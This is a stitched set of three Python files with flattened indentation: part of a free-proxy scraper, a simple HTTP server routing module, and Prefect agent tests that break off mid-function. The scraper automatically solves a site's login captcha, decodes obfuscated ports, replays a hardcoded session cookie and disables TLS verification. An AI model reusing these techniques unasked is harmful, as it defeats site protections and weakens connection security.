with codecs.open('{}gatherproxy'.format(data_dir), 'r', encoding='utf-8') as f:
file_d = [ii.strip() for ii in f.readlines()]
waitjudge_http = ['http://' + ii for ii in file_d]
waitjudge_https = ['https://' + ii for ii in file_d]
if not types:
self.waitjudge += waitjudge_http
elif types ==1:
self.waitjudge += waitjudge_https
elif types == 2:
self.waitjudge += (waitjudge_http + waitjudge_https)
else:
self.waitjudge += file_d
echo(2, 'load gather over!')
def goubanjia(self):
"""
:-1: html tags are mixed with invalid data
:100: most importantly, the port is written in the 'class' attribute rather than in the text.
The website is difficult to scrape, but the proxies are very good
goubanjia proxy http://www.goubanjia.com
"""
version = begin_time()
host = 'http://www.goubanjia.com'
html = self.proxy_req(host, 0)
if not html:
return []
trs = html.find_all('tr', class_=['warning', 'success'])
for tr in trs:
tds = tr.find_all('td')
ip = tds[2].find_all('a')[0].text + '://'
iplist = tds[0].find_all(
['div', 'span', not 'p'], class_=not 'port')
for index in iplist:
ip += index.text
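# goubanjia hides the real port in the element's second CSS class: the class letters are decoded as base-10 digits (ord(letter) - ord('A')), and the resulting number divided by 8 is the actual port.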
encode = tds[0].find_all(['div', 'span', 'p'], class_='port')[
0]['class'][1]
uncode = functools.reduce(
lambda x, y: x * 10 + (ord(y) - ord('A')), map(lambda x: x, encode), 0)
self.waitjudge.append(ip + ':' + str(int(uncode / 8)))
self.threadjude()
end_time(version)
def schedulegou(self):
sched = BlockingScheduler()
sched.add_job(self.goubanjia, 'interval', seconds=100)
sched.start()
def data5u(self):
"""
data5u proxy http://www.data5u.com/
almost none of its proxies are usable
"""
version = begin_time()
url_list = [
'', 'free/gngn/index.shtml', 'free/gwgn/index.shtml'
]
host = 'http://www.data5u.com/'
for uri in url_list:
html = self.proxy_req(host + uri, 0)
if not html:
continue
table = html.find_all('ul', class_='l2')
for index in table:
tds = index.find_all('li')
ip = tds[3].text
self.waitjudge.append(
ip + '://' + tds[0].text + ':' + tds[1].text)
self.threadjude()
end_time(version)
def sixsixip(self, area, page):
"""
66ip proxy http://www.66ip.cn/areaindex_{area}/{page}.html
"""
version = begin_time()
threadings = []
for index in range(1, area + 1):
for pageindex in range(1, page + 1):
echo(2,str(index) + ' ' + str(pageindex))
work = threading.Thread(
target=self.sixsixthread, args=(index, pageindex))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
self.threadjude()
end_time(version)
def sixsixthread(self, index, pageindex):
host = '''http://www.66ip.cn/areaindex_%d/%d.html'''
html = self.proxy_req(host % (index, pageindex), 0)
if not html:
return []
trs = html.find_all('table')[2].find_all('tr')
for test in range(1, len(trs) - 1):
tds = trs[test].find_all('td')
self.waitjudge.append('http://' + tds[0].text + ':' + tds[1].text)
self.waitjudge.append('https://' + tds[0].text + ':' + tds[1].text)
def kuaidaili(self, page):
"""
kuaidaili https://www.kuaidaili.com/free/
"""
version = begin_time()
threadings = []
for index in range(1, page + 1):
work = threading.Thread(
target=self.kuaidailithread, args=(index,))
threadings.append(work)
for work in threadings:
work.start()
for work in threadings:
work.join()
self.threadjude()
end_time(version)
def kuaidailithread(self, index):
host = '''https://www.kuaidaili.com/free/inha/%d/'''
html = self.proxy_req(host % index, 0)
if not html:
return []
trs = html.find_all('tr')
for index in range(1, len(trs)):
tds = trs[index].find_all('td')
ip = tds[3].text.lower() + "://" + tds[0].text + ':' + tds[1].text
self.waitjudge.append(ip)
def get_cookie(self):
"""
log in to refresh the cookie
PS: Although the cookie's expiry time is more than 1 year,
it becomes invalid once the connection closes.
So you need to reactivate the cookie with this function.
"""
headers = {
'pragma': 'no-cache',
'cache-control': 'no-cache',
'Host': 'www.gatherproxy.com',
'Origin': 'http://www.gatherproxy.com',
'Referer': 'http://www.gatherproxy.com/proxylist/anonymity/?t=Transparent',
'Cookie': '_lang=en-US; _ga=GA1.2.1084455496.1548351129; _gid=GA1.2.1515017701.1552361687; ASP.NET_SessionId=ckin3pzyqyoyt3zg54zrtrct; _gat=1; arp_scroll_position=57',
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
"Accept-Encoding": "",
"Accept-Language": "zh-CN,zh;q=0.9",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3682.0 Safari/537.36",
}
login_url = 'http://www.gatherproxy.com/subscribe/login'
cookie_html = basic_req(login_url, 3, header=headers)
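# The login page shows a spelled-out arithmetic captcha (e.g. "Three + Two = ?") inside a <span class="blue"> element; parse the two operands and the operator, then compute the answer below.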
verify_text = re.findall('<span class="blue">(.*?)</span>', cookie_html)[0]
verify_list = verify_text.replace('= ','').strip().split()
num_map = {'Zero': 0, 'One': 1, 'Two': 2, 'Three': 3, 'Four': 4, 'Five': 5, 'Six': 6, 'Seven': 7, 'Eight': 8, 'Nine': 9, 'Ten': 10}
verify_num = [verify_list[0], verify_list[2]]
for index, num in enumerate(verify_num):
if num.isdigit():
verify_num[index] = int(num)
elif num in num_map:
verify_num[index] = num_map[num]
else:
echo(0, 'Error', index)
# return False
verify_code = 0
error = True
operation = verify_list[1]
if operation == '+' or operation == 'plus' or operation == 'add' or operation == 'multiplied':
verify_code = verify_num[0] + verify_num[1]
error = False
if operation == '-' or operation == 'minus':
verify_code = verify_num[0] - verify_num[1]
error = False
if operation == 'X' or operation == 'multiplication':
verify_code = verify_num[0] * verify_num[1]
error = False
if error:
echo(0, 'Error', operation)
if not os.path.exists('%spassage'%data_dir):
echo(0, 'gather passage not exist!!!')
return
with codecs.open('%spassage'%data_dir, 'r', encoding='utf-8') as f:
passage = [index[:-1] for index in f.readlines()]
data = {'Username': passage[0], 'Password': passage[1], 'Captcha': str(verify_code)}
time.sleep(2.163)
r = requests.session()
r.cookies = cj.LWPCookieJar()
login_req = r.post(login_url, headers=headers, data=data, verify=False)
def load_gather(self):
"""
load gather proxy pool text
If it fails, you should reactivate the cookie (see get_cookie).
"""
headers = {
'pragma': 'no-cache',
'cache-control': 'no-cache',
'Host': 'www.gatherproxy.com',
'Origin': 'http://www.gatherproxy.com',
'Referer': 'http://www.gatherproxy.com/proxylist/anonymity/?t=Transparent',
'Cookie': '_lang=en-US; _ga=GA1.2.1084455496.1548351129; _gid=GA1.2.1515017701.1552361687; ASP.NET_SessionId=ckin3pzyqyoyt3zg54zrtrct; _gat=1; arp_scroll_position=57',
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
"Accept-Encoding": "",
"Accept-Language": "zh-CN,zh;q=0.9",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3682.0 Safari/537.36",
}
url = 'http://www.gatherproxy.com/subscribe/infos'
try:
sid_url_req = requests.get(url, headers=headers, verify=False, timeout=10)
except:
return
sid_url_html = BeautifulSoup(sid_url_req.text, 'html.parser')
sid_url = sid_url_html.find_all('div', class_='wrapper')[1].find_all('a')[0]['href']
if len(sid_url.split('sid=')) < 2:
echo(0, 'cookie error')
self.get_cookie()
self.load_gather()
return
sid = sid_url.split('sid=')[1]
sid_url = 'http://www.gatherproxy.com' + sid_url
data = {'ID':sid , 'C': '', 'P': '', 'T': '', 'U': '0'}
gatherproxy = requests.post(sid_url, headers=headers, data=data, verify=False)
with codecs.open(data_dir + 'gatherproxy', 'w', encoding='utf-8') as f:
f.write(gatherproxy.text)
def load_proxies_list(self, types=2):
''' load proxies '''
SITES = ['http://www.proxyserverlist24.top/', 'http://www.live-socks.net/']
spider_pool = []
self.waitjudge = []
for site in SITES:
self.get_other_proxies(site)
if os.path.exists('{}gatherproxy'.format(data_dir)):
self.gatherproxy(3)
waitjudge = list(set(self.waitjudge))
waitjudge_http = ['http://' + ii for ii in waitjudge]
waitjudge_https = ['https://' + ii for ii in waitjudge]
if not types:
self.waitjudge = waitjudge_http
elif types == 1:
self.waitjudge = waitjudge_https
else:
self.waitjudge = (waitjudge_http + waitjudge_https)
echo(1, '-_-_-_-_-_-_-', len(waitjudge), 'Proxies wait to judge -_-_-_-_-_-_-')
def request_text(self, url):
''' requests text '''
req = basic_req(url, 2)
if req is None:
echo(0, url)
if can_retry(url):
self.request_text(url)
else:
return ''
else:
echo(1, url)
return req.text
def get_other_proxies(self, url):
''' get other proxies '''
text = self.request_text(url)
pages = re.findall(r'<h3[\s\S]*?<a.*?(http.*?\.html).*?</a>', '' if text is None else text)
if not pages:
echo(0, 'Please do not frequently request {}!!!'.format(url))
else:
proxies = [re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}', self.request_text(ii)) for ii in pages]
self.waitjudge = [*self.waitjudge, *sum(proxies, [])]
def load_proxies_test(self):
''' load mode & test proxies '''
start = time.time()
self.load_proxies_list()
proxies_len = len(self.waitjudge)
self.threadjude()
canuse_len = len(self.canuse_proxies)
echo(1, '\nTotal Proxies num: {}\nCan use num: {}\nTime spend: {:.2f}s\n'.format(proxies_len, canuse_len,time.time() - start))
with open('{}canuse_proxies.txt'.format(data_dir), 'w') as f:
f.write('\n'.join(self.canuse_proxies))
if __name__ == '__main__':
if not os.path.exists(data_dir):
os.makedirs(data_dir)
parser = argparse.ArgumentParser(description='gunjianpan proxy pool code')
parser.add_argument('--model', type=int, default=0, metavar='model',help='model 0/1')
parser.add_argument('--is_service', type=bool, default=False, metavar='service',help='True or False')
parser.add_argument('--test_time', type=int, default=1, metavar='test_time',help='test_time')
model = parser.parse_args().model
a = GetFreeProxy()
if model == 1:
a.load_gather()
elif model == 0:
a.load_proxies_test()
else:
a.testdb(2)
|
http_server.py
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2018 Keijack Wu
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import json
import socket
import os
import re
import threading
import asyncio
from asyncio.base_events import Server
from asyncio.streams import StreamReader, StreamWriter
from ssl import PROTOCOL_TLS_SERVER, SSLContext
from collections import OrderedDict
from socketserver import ThreadingMixIn, TCPServer
from time import sleep
from urllib.parse import unquote
from typing import Any, Callable, Dict, List, Tuple
from simple_http_server import ControllerFunction, StaticFile
from .http_protocol_handler import HttpProtocolHandler, SocketServerStreamRequestHandlerWraper
from .wsgi_request_handler import WSGIRequestHandler
from .__utils import remove_url_first_slash, get_function_args, get_function_kwargs, get_path_reg_pattern
from .logger import get_logger
_logger = get_logger("simple_http_server.http_server")
class RoutingConf:
HTTP_METHODS = ["OPTIONS", "GET", "HEAD",
"POST", "PUT", "DELETE", "TRACE", "CONNECT"]
def __init__(self, res_conf={}):
self.method_url_mapping: Dict[str,
Dict[str, ControllerFunction]] = {"_": {}}
self.path_val_url_mapping: Dict[str, Dict[str, ControllerFunction]] = {
"_": OrderedDict()}
self.method_regexp_mapping: Dict[str, Dict[str, ControllerFunction]] = {
"_": OrderedDict()}
for mth in self.HTTP_METHODS:
self.method_url_mapping[mth] = {}
self.path_val_url_mapping[mth] = OrderedDict()
self.method_regexp_mapping[mth] = OrderedDict()
self.filter_mapping = OrderedDict()
self._res_conf = []
self.add_res_conf(res_conf)
self.ws_mapping = OrderedDict()
self.ws_path_val_mapping = OrderedDict()
self.error_page_mapping = {}
@property
def res_conf(self):
return self._res_conf
@res_conf.setter
def res_conf(self, val: Dict[str, str]):
self._res_conf.clear()
self.add_res_conf(val)
def add_res_conf(self, val: Dict[str, str]):
if not val or not isinstance(val, dict):
return
for res_k, v in val.items():
if res_k.startswith("/"):
k = res_k[1:]
else:
k = res_k
if k.endswith("/*"):
key = k[0:-1]
elif k.endswith("/**"):
key = k[0:-2]
elif k.endswith("/"):
key = k
else:
key = k + "/"
if v.endswith(os.path.sep):
val = v
else:
val = v + os.path.sep
self._res_conf.append((key, val))
self._res_conf.sort(key=lambda it: -len(it[0]))
def map_controller(self, ctrl: ControllerFunction):
url = ctrl.url
regexp = ctrl.regexp
method = ctrl.method
_logger.debug(
f"map url {url}|{regexp} with method[{method}] to function {ctrl.func}. ")
assert method is None or method == "" or method.upper() in self.HTTP_METHODS
_method = method.upper() if method is not None and method != "" else "_"
if regexp:
self.method_regexp_mapping[_method][regexp] = ctrl
else:
_url = remove_url_first_slash(url)
path_pattern, path_names = get_path_reg_pattern(_url)
if path_pattern is None:
self.method_url_mapping[_method][_url] = ctrl
else:
self.path_val_url_mapping[_method][path_pattern] = (
ctrl, path_names)
def _res_(self, path, res_pre, res_dir):
fpath = os.path.join(res_dir, path.replace(res_pre, ""))
_logger.debug(f"static file. {path} :: {fpath}")
fext = os.path.splitext(fpath)[1]
ext = fext.lower()
if ext in (".html", ".htm", ".xhtml"):
content_type = "text/html"
elif ext == ".xml":
content_type = "text/xml"
elif ext == ".css":
content_type = "text/css"
elif ext in (".jpg", ".jpeg"):
content_type = "image/jpeg"
elif ext == ".png":
content_type = "image/png"
elif ext == ".webp":
content_type = "image/webp"
elif ext == ".js":
content_type = "text/javascript"
elif ext == ".pdf":
content_type = "application/pdf"
elif ext == ".mp4":
content_type = "video/mp4"
elif ext == ".mp3":
content_type = "audio/mp3"
else:
content_type = "application/octet-stream"
return StaticFile(fpath, content_type)
def get_url_controller(self, path="", method="") -> Tuple[ControllerFunction, Dict, List]:
# explicitly url matching
if path in self.method_url_mapping[method]:
return self.method_url_mapping[method][path], {}, ()
elif path in self.method_url_mapping["_"]:
return self.method_url_mapping["_"][path], {}, ()
# url with path value matching
fun_and_val = self.__try_get_from_path_val(path, method)
if fun_and_val is None:
fun_and_val = self.__try_get_from_path_val(path, "_")
if fun_and_val is not None:
return fun_and_val[0], fun_and_val[1], ()
# regexp
func_and_groups = self.__try_get_from_regexp(path, method)
if func_and_groups is None:
func_and_groups = self.__try_get_from_regexp(path, "_")
if func_and_groups is not None:
return func_and_groups[0], {}, func_and_groups[1]
# static files
for k, v in self.res_conf:
if path.startswith(k):
def static_fun():
return self._res_(path, k, v)
return ControllerFunction(func=static_fun), {}, ()
return None, {}, ()
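# Added note (illustrative, not part of the original source): the lookup order
# above is exact URL -> path-variable pattern -> regexp -> static resource.
# For example, a controller registered for "user/{uid}" would be found in the
# second step for the request path "user/42", returning {"uid": "42"} as the
# path-value dict (assuming get_path_reg_pattern turns the "{uid}" segment into
# a capturing pattern, as its name suggests).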
def __try_get_from_regexp(self, path, method):
for regex, ctrl in self.method_regexp_mapping[method].items():
m = re.match(regex, path)
_logger.debug(
f"regexp::pattern::[{regex}] => path::[{path}] match? {m is not None}")
if m:
return ctrl, tuple([unquote(v) for v in m.groups()])
return None
def __try_get_from_path_val(self, path, method):
for patterns, val in self.path_val_url_mapping[method].items():
m = re.match(patterns, path)
_logger.debug(
f"url with path value::pattern::[{patterns}] => path::[{path}] match? {m is not None}")
if m:
fun, path_names = val
path_values = {}
for idx in range(len(path_names)):
key = unquote(path_names[idx])
path_values[key] = unquote(m.groups()[idx])
return fun, path_values
return None
def map_filter(self, filter_conf: Dict[str, Any]):
# {"path": p, "url_pattern": r, "func": filter_fun}
path = filter_conf["path"] if "path" in filter_conf else ""
regexp = filter_conf["url_pattern"]
filter_fun = filter_conf["func"]
if path:
regexp = get_path_reg_pattern(path)[0]
if not regexp:
regexp = f"^{path}$"
_logger.debug(f"[path: {path}] map url regexp {regexp} to function: {filter_fun}")
self.filter_mapping[regexp] = filter_fun
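# Added usage sketch (assumption, not from the original source): map_filter
# expects a dict shaped like the comment above, e.g.
#   routing_conf.map_filter({"path": "/api/user", "url_pattern": "", "func": my_filter})
# where my_filter is a hypothetical callable; when "path" is given it is turned
# into a regexp via get_path_reg_pattern, otherwise "url_pattern" is used as-is.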
def get_matched_filters(self, path):
return self._get_matched_filters(remove_url_first_slash(path)) + self._get_matched_filters(path)
def _get_matched_filters(self, path):
available_filters = []
for regexp, val in self.filter_mapping.items():
m = re.match(regexp, path)
_logger.debug(f"filter:: [{regexp}], path:: [{path}] match? {m is not None}")
if m:
available_filters.append(val)
return available_filters
def map_websocket_handler(self, endpoint, handler_class):
url = remove_url_first_slash(endpoint)
path_pattern, path_names = get_path_reg_pattern(url)
if path_pattern is None:
self.ws_mapping[url] = handler_class
else:
self.ws_path_val_mapping[path_pattern] = (
handler_class, path_names)
def get_websocket_handler(self, path):
if path in self.ws_mapping:
return self.ws_mapping[path], {}
return self.__try_get_ws_handler_from_path_val(path)
def __try_get_ws_handler_from_path_val(self, path):
for patterns, val in self.ws_path_val_mapping.items():
m = re.match(patterns, path)
_logger.debug(
f"websocket endpoint with path value::pattern::[{patterns}] => path::[{path}] match? {m is not None}")
if m:
clz, path_names = val
path_values = {}
for idx in range(len(path_names)):
key = unquote(path_names[idx])
path_values[key] = unquote(m.groups()[idx])
return clz, path_values
return None, {}
def map_error_page(self, code: str, error_page_fun: Callable):
if not code:
c = "_"
else:
c = str(code).lower()
self.error_page_mapping[c] = error_page_fun
def _default_error_page(self, code: int, message: str = "", explain: str = ""):
return json.dumps({
"code": code,
"message": message,
"explain": explain
})
def error_page(self, code: int, message: str = "", explain: str = ""):
c = str(code)
func = None
if c in self.error_page_mapping:
func = self.error_page_mapping[c]
elif code > 200:
c0x = c[0:2] + "x"
if c0x in self.error_page_mapping:
func = self.error_page_mapping[c0x]
elif "_" in self.error_page_mapping:
func = self.error_page_mapping["_"]
if not func:
func = self._default_error_page
_logger.debug(f"error page function:: {func}")
co = code
msg = message
exp = explain
args_def = get_function_args(func, None)
kwargs_def = get_function_kwargs(func, None)
args = []
for n, t in args_def:
_logger.debug(f"set value to error_page function -> {n}")
if co is not None:
if t is None or t == int:
args.append(co)
co = None
continue
if msg is not None:
if t is None or t == str:
args.append(msg)
msg = None
continue
if exp is not None:
if t is None or t == str:
args.append(exp)
exp = None
continue
args.append(None)
kwargs = {}
for n, v, t in kwargs_def:
if co is not None:
if (t is None and isinstance(v, int)) or t == int:
kwargs[n] = co
co = None
continue
if msg is not None:
if (t is None and isinstance(v, str)) or t == str:
kwargs[n] = msg
msg = None
continue
if exp is not None:
if (t is None and isinstance(v, str)) or t == str:
kwargs[n] = exp
exp = None
continue
kwargs[n] = v
if args and kwargs:
return func(*args, **kwargs)
elif args:
return func(*args)
elif kwargs:
return func(**kwargs)
else:
return func()
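# Added note (illustrative): for code 404 the lookup above tries the exact key
# "404", then the family key "40x" (c[0:2] + "x"), then the wildcard "_", and
# finally falls back to _default_error_page, so map_error_page("40x", handler)
# would cover every 4xx status that has no exact mapping.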
class HTTPServer(TCPServer, RoutingConf):
allow_reuse_address = 1 # Seems to make sense in testing environment
def server_bind(self):
"""Override server_bind to store the server name."""
TCPServer.server_bind(self)
host, port = self.server_address[:2]
self.server_name = socket.getfqdn(host)
self.server_port = port
def __init__(self, addr, res_conf={}):
TCPServer.__init__(self, addr, SocketServerStreamRequestHandlerWraper)
RoutingConf.__init__(self, res_conf)
class ThreadingMixInHTTPServer(ThreadingMixIn, HTTPServer):
def start(self):
self.serve_forever()
def _shutdown(self) -> None:
_logger.debug("shutdown http server in a seperate thread..")
super().shutdown()
def shutdown(self) -> None:
threading.Thread(target=self._shutdown, daemon=False).start()
class CoroutineHTTPServer(RoutingConf):
def __init__(self, host: str = '', port: int = 9090, ssl: SSLContext = None, res_conf={}) -> None:
RoutingConf.__init__(self, res_conf)
self.host: str = host
self.port: int = port
self.ssl: SSLContext = ssl
self.server: Server = None
async def callback(self, reader: StreamReader, writer: StreamWriter):
handler = HttpProtocolHandler(reader, writer, routing_conf=self)
await handler.handle_request()
_logger.debug("Connection ends, close the writer.")
writer.close()
async def start_server(self):
self.server = await asyncio.start_server(
self.callback, host=self.host, port=self.port, ssl=self.ssl)
async with self.server:
try:
await self.server.serve_forever()
except asyncio.exceptions.CancelledError:
_logger.debug(
"Some requests are lost for the reason that the server is shutted down.")
finally:
await self.server.wait_closed()
def start(self):
asyncio.run(self.start_server())
def _shutdown(self):
_logger.debug("Try to shutdown server.")
self.server.close()
loop = self.server.get_loop()
loop.call_soon_threadsafe(loop.stop)
def shutdown(self):
wait_time = 3
while wait_time:
sleep(1)
_logger.debug(f"couting to shutdown: {wait_time}")
wait_time = wait_time - 1
if wait_time == 0:
_logger.debug("shutdown server....")
self._shutdown()
class SimpleDispatcherHttpServer:
"""Dispatcher Http server"""
def map_filter(self, filter_conf):
self.server.map_filter(filter_conf)
def map_controller(self, ctrl: ControllerFunction):
self.server.map_controller(ctrl)
def map_websocket_handler(self, endpoint, handler_class):
self.server.map_websocket_handler(endpoint, handler_class)
def map_error_page(self, code, func):
self.server.map_error_page(code, func)
def __init__(self,
host: Tuple[str, int] = ('', 9090),
ssl: bool = False,
ssl_protocol: int = PROTOCOL_TLS_SERVER,
ssl_check_hostname: bool = False,
keyfile: str = "",
certfile: str = "",
keypass: str = "",
ssl_context: SSLContext = None,
resources: Dict[str, str] = {},
prefer_corountine=False):
self.host = host
self.__ready = False
self.ssl = ssl
if ssl:
if ssl_context:
self.ssl_ctx = ssl_context
else:
assert keyfile and certfile, "keyfile and certfile should be provided. "
ssl_ctx = SSLContext(protocol=ssl_protocol)
ssl_ctx.check_hostname = ssl_check_hostname
ssl_ctx.load_cert_chain(
certfile=certfile, keyfile=keyfile, password=keypass)
self.ssl_ctx = ssl_ctx
else:
self.ssl_ctx = None
if prefer_corountine:
_logger.info(f"Start server in corouting mode, listen to port: {self.host[1]}")
self.server = CoroutineHTTPServer(
self.host[0], self.host[1], self.ssl_ctx, resources)
else:
_logger.info(f"Start server in threading mixed mode, listen to port {self.host[1]}")
self.server = ThreadingMixInHTTPServer(self.host, resources)
if self.ssl_ctx:
self.server.socket = self.ssl_ctx.wrap_socket(
self.server.socket, server_side=True)
@property
def ready(self):
return self.__ready
def resources(self, res={}):
self.server.res_conf = res
def start(self):
try:
self.__ready = True
self.server.start()
except:
self.__ready = False
raise
def shutdown(self):
# shut it down in a separate thread.
self.server.shutdown()
class WSGIProxy(RoutingConf):
def __init__(self, res_conf):
super().__init__(res_conf=res_conf)
def app_proxy(self, environment, start_response):
return asyncio.run(self.async_app_proxy(environment, start_response))
async def async_app_proxy(self, environment, start_response):
requestHandler = WSGIRequestHandler(self, environment, start_response)
return await requestHandler.handle_request()
|
test_agent.py
|
import logging
import socket
import time
from unittest.mock import MagicMock
import pytest
from prefect.agent import Agent
from prefect.engine.state import Scheduled
from prefect.utilities.configuration import set_temporary_config
from prefect.utilities.exceptions import AuthorizationError
from prefect.utilities.graphql import GraphQLResult
def test_agent_init(cloud_api):
agent = Agent()
assert agent
def test_multiple_agent_init_doesnt_duplicate_logs(cloud_api):
a, b, c = Agent(), Agent(), Agent()
assert len(c.logger.handlers) == 1
def test_agent_config_options(cloud_api):
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = Agent()
assert agent.labels == []
assert agent.env_vars == dict()
assert agent.max_polls is None
assert agent.client.get_auth_token() == "TEST_TOKEN"
assert agent.name == "agent"
assert agent.logger
assert agent.logger.name == "agent"
def test_agent_name_set_options(monkeypatch, cloud_api):
# Default
agent = Agent()
assert agent.name == "agent"
assert agent.logger.name == "agent"
# Init arg
agent = Agent(name="test1")
assert agent.name == "test1"
assert agent.logger.name == "test1"
# Config
with set_temporary_config({"cloud.agent.name": "test2"}):
agent = Agent()
assert agent.name == "test2"
assert agent.logger.name == "test2"
def test_agent_log_level(cloud_api):
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = Agent()
assert agent.logger.level == 20
def test_agent_log_level_responds_to_config(cloud_api):
with set_temporary_config(
{
"cloud.agent.auth_token": "TEST_TOKEN",
"cloud.agent.level": "DEBUG",
"cloud.agent.agent_address": "http://localhost:8000",
}
):
agent = Agent()
assert agent.logger.level == 10
assert agent.agent_address == "http://localhost:8000"
def test_agent_env_vars(cloud_api):
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = Agent(env_vars=dict(AUTH_THING="foo"))
assert agent.env_vars == dict(AUTH_THING="foo")
def test_agent_env_vars_from_config(cloud_api):
with set_temporary_config(
{
"cloud.agent.auth_token": "TEST_TOKEN",
"cloud.agent.env_vars": {"test1": "test2", "test3": "test4"},
}
):
agent = Agent()
assert agent.env_vars == {"test1": "test2", "test3": "test4"}
def test_agent_max_polls(cloud_api):
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = Agent(max_polls=10)
assert agent.max_polls == 10
def test_agent_labels(cloud_api):
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = Agent(labels=["test", "2"])
assert agent.labels == ["test", "2"]
def test_agent_labels_from_config_var(cloud_api):
with set_temporary_config({"cloud.agent.labels": ["test", "2"]}):
agent = Agent()
assert agent.labels == ["test", "2"]
def test_agent_log_level_debug(cloud_api):
with set_temporary_config(
{"cloud.agent.auth_token": "TEST_TOKEN", "cloud.agent.level": "DEBUG"}
):
agent = Agent()
assert agent.logger.level == 10
def test_agent_fails_no_auth_token(cloud_api):
with pytest.raises(AuthorizationError):
agent = Agent().start()
def test_agent_fails_no_runner_token(monkeypatch, cloud_api):
post = MagicMock(
return_value=MagicMock(
json=MagicMock(
return_value=dict(
data=dict(auth_info=MagicMock(api_token_scope="USER"))
)
)
)
)
session = MagicMock()
session.return_value.post = post
monkeypatch.setattr("requests.Session", session)
with pytest.raises(AuthorizationError):
agent = Agent().start()
def test_query_flow_runs(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
get_runs_in_queue=MagicMock(flow_run_ids=["id"]),
flow_run=[{"id": "id"}],
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
flow_runs = agent.query_flow_runs()
assert flow_runs == [{"id": "id"}]
def test_query_flow_runs_ignores_currently_submitting_runs(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
get_runs_in_queue=MagicMock(flow_run_ids=["id1", "id2"]),
flow_run=[{"id1": "id1"}],
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
agent.submitting_flow_runs.add("id2")
agent.query_flow_runs()
assert len(gql_return.call_args_list) == 2
assert (
'id: { _in: ["id1"] }'
in list(gql_return.call_args_list[1][0][0]["query"].keys())[0]
)
def test_query_flow_runs_does_not_use_submitting_flow_runs_directly(
monkeypatch, caplog, cloud_api
):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
get_runs_in_queue=MagicMock(flow_run_ids=["already-submitted-id"]),
flow_run=[{"id": "id"}],
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
agent.logger.setLevel(logging.DEBUG)
copy_mock = MagicMock(return_value=set(["already-submitted-id"]))
agent.submitting_flow_runs = MagicMock(copy=copy_mock)
flow_runs = agent.query_flow_runs()
assert flow_runs == []
assert "1 already submitting: ['already-submitted-id']" in caplog.text
copy_mock.assert_called_once_with()
def test_update_states_passes_no_task_runs(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(set_flow_run_state=None, set_task_run_state=None)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
assert not agent.update_state(
flow_run=GraphQLResult(
{
"id": "id",
"serialized_state": Scheduled().serialize(),
"version": 1,
"task_runs": [],
}
)
)
def test_update_states_passes_task_runs(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(set_flow_run_state=None, set_task_run_state=None)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
assert not agent.update_state(
flow_run=GraphQLResult(
{
"id": "id",
"serialized_state": Scheduled().serialize(),
"version": 1,
"task_runs": [
GraphQLResult(
{
"id": "id",
"version": 1,
"serialized_state": Scheduled().serialize(),
}
)
],
}
)
)
def test_mark_failed(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(set_flow_run_state=None, set_task_run_state=None)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
assert not agent.mark_failed(
flow_run=GraphQLResult(
{
"id": "id",
"serialized_state": Scheduled().serialize(),
"version": 1,
"task_runs": [],
}
),
exc=Exception(),
)
def test_deploy_flows_passes_base_agent(cloud_api):
agent = Agent()
with pytest.raises(NotImplementedError):
agent.deploy_flow(None)
def test_heartbeat_passes_base_agent(cloud_api):
agent = Agent()
assert not agent.heartbeat()
def test_agent_connect(monkeypatch, cloud_api):
